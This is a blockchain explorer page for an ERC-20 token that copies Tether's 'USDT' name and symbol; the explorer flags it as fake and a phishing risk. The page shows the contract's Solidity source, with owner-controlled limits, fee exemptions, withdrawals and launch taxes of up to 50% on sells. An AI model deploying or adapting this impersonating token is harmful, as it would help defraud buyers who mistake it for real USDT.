This is a fake USDT token. Please exercise caution when interacting with it.
ERC-20
Phish / Hack
Overview
Max Total Supply
100,000,000 ERC-20 TOKEN*
Holders
121 (0.00%)
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
249,581.328132819838340126 ERC-20 TOKEN*Value
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
USDT
Compiler Version
v0.8.19+commit.7dd6d404
Optimization Enabled:
Yes with 200 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: MIT // Website: https://usdt.gay // Twitter: https://twitter.com/USDTgay pragma solidity 0.8.19; import "openzeppelin-contracts/access/Ownable.sol"; import "openzeppelin-contracts/token/ERC20/ERC20.sol"; import "./IUniswapV2Router02.sol"; contract USDT is ERC20, Ownable { IUniswapV2Router02 public immutable uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uint256 public tradingStartTimeStamp; uint256 public maxHoldingAmount; uint256 public maxTransactionAmount; uint256 private swapTokensAt; address public deployerWallet; address public marketingWallet; address public uniswapV2Pair; bool public limited; bool public swapEnabled; bool private swapping; mapping (address => bool) private _ExcludedFromFees; mapping (address => bool) private _ExcludedFromTransactionAmount; error CanOnlySetPairOnce(address); error InvalidPresalePrice(uint256); error ExceedsHoldingAmount(uint256); error ExceedsMaxTransactionAmount(uint256); error TradingHasNotStarted(); error WithdrawFailed(); constructor( uint256 _totalSupply, address _marketingWallet ) ERC20("USDT", "USDT") { _mint(msg.sender, _totalSupply); swapTokensAt = (_totalSupply * 9) / 10_000; swapEnabled = true; deployerWallet = msg.sender; marketingWallet = _marketingWallet; excludeFromFees(msg.sender, true); excludeFromFees(address(this), true); excludeFromFees(marketingWallet, true); excludeFromMaxTransaction(marketingWallet, true); excludeFromMaxTransaction(address(uniswapV2Router), true); excludeFromMaxTransaction(msg.sender, true); excludeFromMaxTransaction(address(this), true); } receive() external payable {} function commenceTrading(address _uniswapV2Pair) external onlyOwner { if (tradingStartTimeStamp != 0) revert CanOnlySetPairOnce(uniswapV2Pair); uniswapV2Pair = _uniswapV2Pair; tradingStartTimeStamp = block.timestamp; } function setLimits( bool _limited, uint256 _maxHoldingAmount, uint256 _maxTransactionAmount ) external onlyOwner { limited = _limited; maxTransactionAmount = _maxTransactionAmount; maxHoldingAmount = _maxHoldingAmount; } function toggleSwapping(bool _bool) external onlyOwner { swapEnabled = _bool; } function excludeFromFees(address _account, bool _excluded) public onlyOwner { _ExcludedFromFees[_account] = _excluded; } function excludeFromMaxTransaction(address _account, bool _excluded) public onlyOwner { _ExcludedFromTransactionAmount[_account] = _excluded; } function withdrawFunds(address payable _address) external onlyOwner { (bool success, ) = _address.call{value: address(this).balance}(""); if (!success) revert WithdrawFailed(); } function withdrawTokens(address payable _address, address _tokenContract) external onlyOwner { uint256 balanceInContract = IERC20(_tokenContract).balanceOf(address(this)); _transfer(address(this), _address, balanceInContract); } function _getTaxes( uint256 _currentTimestamp ) internal view returns (uint256 _buyTax, uint256 _sellTax, bool _eligibleForTax) { uint256 elapsedTime = _currentTimestamp - tradingStartTimeStamp; uint256 buyTax = 2; uint256 sellTax = 2; bool eligibleForTax = true; if (elapsedTime < 1 minutes) { buyTax = 25; sellTax = 50; eligibleForTax = true; } else if (elapsedTime >= 1 minutes && elapsedTime < 5 minutes) { buyTax = 10; sellTax = 10; eligibleForTax = true; } return (buyTax, sellTax, eligibleForTax); } function _transfer( address from, address to, uint256 amount ) internal override { if (uniswapV2Pair == address(0) && from != address(0) && from != owner()) revert TradingHasNotStarted(); if( from != owner() && to != owner() && to != address(0) && to != address(0xdead) && !swapping ) { if (limited) { if (from == uniswapV2Pair && !_ExcludedFromTransactionAmount[to]) { if (amount > maxTransactionAmount) revert ExceedsMaxTransactionAmount(amount); if (balanceOf(to) + amount > maxHoldingAmount) revert ExceedsHoldingAmount(amount); } else if (to == uniswapV2Pair && !_ExcludedFromTransactionAmount[from]) { if (amount > maxTransactionAmount) revert ExceedsMaxTransactionAmount(amount); } else if (!_ExcludedFromTransactionAmount[to]) { if (balanceOf(to) + amount > maxHoldingAmount) revert ExceedsHoldingAmount(amount); } } } uint256 contractBalance = balanceOf(address(this)); bool canSwap = contractBalance >= swapTokensAt; if( canSwap && swapEnabled && !swapping && from != uniswapV2Pair && !_ExcludedFromFees[from] && !_ExcludedFromFees[to] ) { swapping = true; _swapBack(contractBalance); swapping = false; } bool takeFee = !swapping; if(_ExcludedFromFees[from] || _ExcludedFromFees[to]) { takeFee = false; } if (takeFee) { (uint256 buyTax, uint256 sellTax, bool eligibleForTax) = _getTaxes(block.timestamp); if (from == uniswapV2Pair && eligibleForTax) { uint256 tax = (amount * buyTax) / 100; super._transfer(from, address(this), tax); amount -= tax; } if (to == uniswapV2Pair && eligibleForTax) { uint256 tax = (amount * sellTax) / 100; super._transfer(from, address(this), tax); amount -= tax; } } super._transfer(from, to, amount); } function _swapBack(uint256 _contractBalance) private { if (_contractBalance == 0) { return; } // Swap tokens for ETH _swapTokensForEth(_contractBalance); uint256 totalEth = address(this).balance; // Send ETH to marketing wallet (bool success,) = address(marketingWallet).call{value: totalEth}(""); } function _swapTokensForEth(uint256 _tokenAmount) private { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); _approve(address(this), address(uniswapV2Router), _tokenAmount); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( _tokenAmount, 0, path, address(this), block.timestamp ); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; import "../utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; import "./IERC20.sol"; import "./extensions/IERC20Metadata.sol"; import "../../utils/Context.sol"; import "../../utils/math/SafeMath.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } function name() public view virtual override returns (string memory) { return _name; } function symbol() public view virtual override returns (string memory) { return _symbol; } function decimals() public view virtual override returns (uint8) { return 18; } function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply = _totalSupply.add(amount); _balances[account] = _balances[account].add(amount); emit Transfer(address(0), account, amount); } function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance"); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
// SPDX-License-Identifier: MIT pragma solidity >=0.6.2; import './IUniswapV2Router01.sol'; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; import "../IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol) pragma solidity ^0.8.0; // CAUTION // This version of SafeMath should only be used with Solidity 0.8 or later, // because it relies on the compiler's built in overflow checks. /** * @dev Wrappers over Solidity's arithmetic operations. * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * now has built in overflow checking. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * @dev Returns the division of two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {trySub}. * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the integer division of two unsigned integers, reverting with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting with custom message when dividing by zero. * * CAUTION: This function is deprecated because it requires allocating memory for the error * message unnecessarily. For custom revert reasons use {tryMod}. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } }
// SPDX-License-Identifier: MIT pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); }
{ "remappings": [ "ds-test/=lib/forge-std/lib/ds-test/src/", "forge-std/=lib/forge-std/src/", "openzeppelin-contracts/=lib/openzeppelin-contracts/contracts/", "lib/forge-std:ds-test/=lib/forge-std/lib/ds-test/src/" ], "optimizer": { "enabled": true, "runs": 200 }, "metadata": { "useLiteralContent": false, "bytecodeHash": "ipfs", "appendCBOR": true }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "evmVersion": "paris", "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"uint256","name":"_totalSupply","type":"uint256"},{"internalType":"address","name":"_marketingWallet","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"CanOnlySetPairOnce","type":"error"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"ExceedsHoldingAmount","type":"error"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"ExceedsMaxTransactionAmount","type":"error"},{"inputs":[{"internalType":"uint256","name":"","type":"uint256"}],"name":"InvalidPresalePrice","type":"error"},{"inputs":[],"name":"TradingHasNotStarted","type":"error"},{"inputs":[],"name":"WithdrawFailed","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapV2Pair","type":"address"}],"name":"commenceTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"deployerWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_account","type":"address"},{"internalType":"bool","name":"_excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_account","type":"address"},{"internalType":"bool","name":"_excluded","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"limited","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHoldingAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_limited","type":"bool"},{"internalType":"uint256","name":"_maxHoldingAmount","type":"uint256"},{"internalType":"uint256","name":"_maxTransactionAmount","type":"uint256"}],"name":"setLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"_bool","type":"bool"}],"name":"toggleSwapping","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingStartTimeStamp","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address payable","name":"_address","type":"address"}],"name":"withdrawFunds","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address payable","name":"_address","type":"address"},{"internalType":"address","name":"_tokenContract","type":"address"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60a0604052737a250d5630b4cf539739df2c5dacb4c659f2488d6080523480156200002957600080fd5b5060405162001ea138038062001ea18339810160408190526200004c91620003be565b6040805180820182526004808252631554d11560e21b6020808401829052845180860190955291845290830152906003620000888382620004a1565b506004620000978282620004a1565b505050620000b4620000ae6200019c60201b60201c565b620001a0565b620000c03383620001f2565b612710620000d083600962000583565b620000dc91906200059d565b600955600c8054600160a81b60ff60a81b19909116179055600a8054336001600160a01b03199182168117909255600b80549091166001600160a01b0384161790556200012b906001620002da565b62000138306001620002da565b600b5462000151906001600160a01b03166001620002da565b600b546200016a906001600160a01b031660016200030f565b6080516200017a9060016200030f565b620001873360016200030f565b620001943060016200030f565b5050620005d6565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b0382166200024e5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b6002546200025d908262000349565b6002556001600160a01b03821660009081526020819052604090205462000285908262000349565b6001600160a01b038316600081815260208181526040808320949094559251848152919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b620002e462000360565b6001600160a01b03919091166000908152600d60205260409020805460ff1916911515919091179055565b6200031962000360565b6001600160a01b03919091166000908152600e60205260409020805460ff1916911515919091179055565b505050565b6000620003578284620005c0565b90505b92915050565b6005546001600160a01b03163314620003bc5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640162000245565b565b60008060408385031215620003d257600080fd5b825160208401519092506001600160a01b0381168114620003f257600080fd5b809150509250929050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200042857607f821691505b6020821081036200044957634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200034457600081815260208120601f850160051c81016020861015620004785750805b601f850160051c8201